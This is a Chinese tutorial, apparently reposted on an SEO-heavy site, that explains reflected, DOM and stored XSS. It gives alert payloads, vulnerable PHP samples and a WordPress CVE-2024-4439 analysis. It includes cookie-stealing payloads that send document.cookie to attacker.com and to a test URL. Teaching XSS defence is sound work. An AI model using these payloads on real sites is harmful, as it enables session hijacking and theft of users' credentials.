当前位置: 首页 > wzjs >正文

学习网站建设有什么用怎么建立app

学习网站建设有什么用,怎么建立app,宣传页免费模板,外贸网站建设公司教程一、反射型XSS 1.1、原理 介绍: 非持久化,需要用户点击恶意链接触发恶意代码。 反射型XSS是指攻击者通过在URL参数或表单数据中嵌入恶意脚本,服务器将该数据直接反射回用户的浏览器。当用户访问修改过的URL时,恶意脚本在浏览器…

一、反射型XSS

1.1、原理

介绍:

非持久化,需要用户点击恶意链接触发恶意代码。

反射型XSS是指攻击者通过在URL参数或表单数据中嵌入恶意脚本,服务器将该数据直接反射回用户的浏览器。当用户访问修改过的URL时,恶意脚本在浏览器中执行。

具体形式:

1.2、payload

#参考靶场xss-labs-master<script>alert()</script><script>alert()</script> onfocus=javascript:alert()       /*需要点击**/onclick=javascript:alert()       /*需要点击**/<a href=javascript:alert()>x</a>     /*需要点击**/<img src='x' onerror=alert()>onfocus=alert() autofocus=<svg onload="alert(1337)">

1.3、示例

<?php 
ini_set("display_errors", 0);
$str = $_GET["keyword"];
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center>
<form action=level3.php method=GET>
<input name=keyword  value='".htmlspecialchars($str)."'>	
<input type=submit name=submit value=搜索 />
</form>
</center>";
?>

我们输入:1' οnclick='alert(1)

二、DOM型XSS

1.1、原理

介绍:

不需要经过后端代码处理,在前端javascript调用DOM元素时产生的漏洞。

DOM型XSS是指漏洞存在于客户端的JavaScript代码中,攻击者通过修改网页的DOM结构,导致恶意脚本的执行。攻击并不依赖于服务器的响应,而是通过恶意脚本直接修改浏览器中加载的文档。

具体形式:

1、攻击者构造恶意URL

2、用户点击或访问链接

3、页面加载时,前端JavaScript读取location.hash、location.search或document.URL等数据

4、未经过滤处理的恶意数据被插入DOM,导致执行恶意脚本

1.2、payload

<div id="URL"></div>
<script>document.getElementById('URL').innerHTML = decodeURI(location.href); //location.href用于返回当前显示的文档的URL
</script>
//构造的当前页面的URL如下:
http://localhost:8000/domxss.html?<img src=0 onerror="alert("XSS")">
//因此,受害者访问该URL后,由于载入图像失败,因此触发onerror事件,执行URL中指定的JavaScript弹窗代码(弹窗中显示“XSS”)。

1.3、示例

<?php 
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>

我们输入:

<script>
document.write('<img src="http://attacker.com/steal?cookie=' + document.cookie + '" />');
</script>

浏览器中的cookie就会发送到我们的服务器(attacker.com)

三、存储型XSS

1.1、原理

介绍:

攻击者提交数据:攻击者向一个可以存储用户输入的系统提交包含恶意代码的输入,比如评论区、用户资料、论坛帖子等。

数据存储:服务器存储了用户提交的数据,包括其中的恶意代码。

用户查看数据:其他用户在查看这些存储的数据时,服务器将数据从数据库中提取并发送到用户的浏览器。

恶意代码执行:当用户的浏览器渲染返回的数据时,恶意代码被执行。

数据被窃取:用户的数据会传到攻击者的服务器上,这可能导致各种后果,比如窃取cookie、劫持会话、重定向用户到恶意网站等。

具体形式:

1.2、payload

<script>window.open(\'http://localhost/CrackTest/xsstest/test.php?
cookie=\'+document.cookie)</script>

1.3、示例

cve-2024-4439 wordpress 存储型xss

if ( '_blank' === $attributes['linkTarget'] ) {$label = 'aria-label="' . sprintf( esc_attr__( '(%s website link, opens in a new tab)' ), $comment->comment_author ) . '"';}$avatar_block = sprintf( '<a href="%1$s" target="%2$s" %3$s class="wp-block-avatar__link">%4$s</a>', esc_url( $comment->comment_author_url ), esc_attr( $attributes['linkTarget'] ), $label, $avatar_block );}
return sprintf( '<div %1s>%2s</div>', $wrapper_attributes, $avatar_block );其实这里一开始看并没有看出什么问题,细看会发现esc_attr__函数并没有包裹
$comment->comment_author,也就是没有对$comment->comment_author进行处理,
最终通过sprintf翻译输出了$comment->comment_author,在下面的代码中直接就将
$label嵌入到了target="%2$s之后,这就导致了XSS的问题。


文章转载自:

http://0Kb9bAcj.Ljxps.cn
http://pA9f4ARe.Ljxps.cn
http://wJIArtKs.Ljxps.cn
http://B4l5z1N0.Ljxps.cn
http://69voxKO5.Ljxps.cn
http://TIR8ms85.Ljxps.cn
http://hqxgXqT0.Ljxps.cn
http://9qel2t5N.Ljxps.cn
http://SKJFvbMm.Ljxps.cn
http://Nxvw3WMy.Ljxps.cn
http://NmQbX8ji.Ljxps.cn
http://fSRPspj6.Ljxps.cn
http://nEtAJ3BP.Ljxps.cn
http://A3Cpgieh.Ljxps.cn
http://MwyWPjcm.Ljxps.cn
http://8iLCm9eE.Ljxps.cn
http://kczw7Aha.Ljxps.cn
http://6SEEMkNM.Ljxps.cn
http://aJ45slO8.Ljxps.cn
http://Bb3G4hoA.Ljxps.cn
http://LGDYEPxV.Ljxps.cn
http://MKAKtHX3.Ljxps.cn
http://6wBe6Igw.Ljxps.cn
http://BMBCdnEE.Ljxps.cn
http://VffM9HUE.Ljxps.cn
http://2cD38rES.Ljxps.cn
http://T7c8qyO3.Ljxps.cn
http://vjRFoUFo.Ljxps.cn
http://Ai1IGamD.Ljxps.cn
http://8kBpEHS9.Ljxps.cn
http://www.dtcms.com/wzjs/736038.html

相关文章:

  • 公司网站制作内容网站建设价格标准报价单
  • c 做网站session用法网站图片的作用
  • 超频三网站谁家做的规模大的企业建站
  • 淘宝网站建设维护会计科目企业手机网站cms系统
  • 网站放到iis如何做指向电商网站界面设计流程
  • 专业网站制作的公司哪家好网站建设 预付款
  • 做网站商城怎么样生物网站 template
  • 网站外链带nofollow是什么意思wordpress 提交审批
  • 油漆企业网站要怎么做成都网站建设与开发
  • 重庆城市建设档案馆网站虚拟主机的概念和功能
  • 服务好的丹阳网站建设建设美食网站的作用
  • 广州高端网站设计erp系统的优点
  • 网上有兼职做数据网站社区网站制作
  • 厦门免费自助建站模板wordpress七牛远程图片
  • 永久免费域名注册网站住房城乡建设网站查询
  • 个人或主题网站建设 实验体会网站制作软件排名
  • 校园网站建设培训的心得体会计算机网站开发就业形势
  • 货运公司网站源码seo网站排名优化服务
  • 广州网站维护公司网站制作方案
  • 维持一个素材网站要多少钱广州网站开发企业
  • 成都网络推广网站seo工具有哪些
  • 网站建设哪家好建议兴田德润怎样做自己的 优惠卷网站
  • 做网站的小图标自己做的网站百度搜不到
  • 兰州网站建设公司做标记网站
  • 佛山做外贸网站的公司吗网站设计策划书案例
  • 怎样用ps做网站网络程序员
  • 石家庄网站建设选汉狮权威发布意思
  • 惠州做网站优化米定制网的网站是那个公司做
  • 网站的主要功能网站建设怎么管理业务员
  • 网站里的专题页面每天试用三小时vp加速器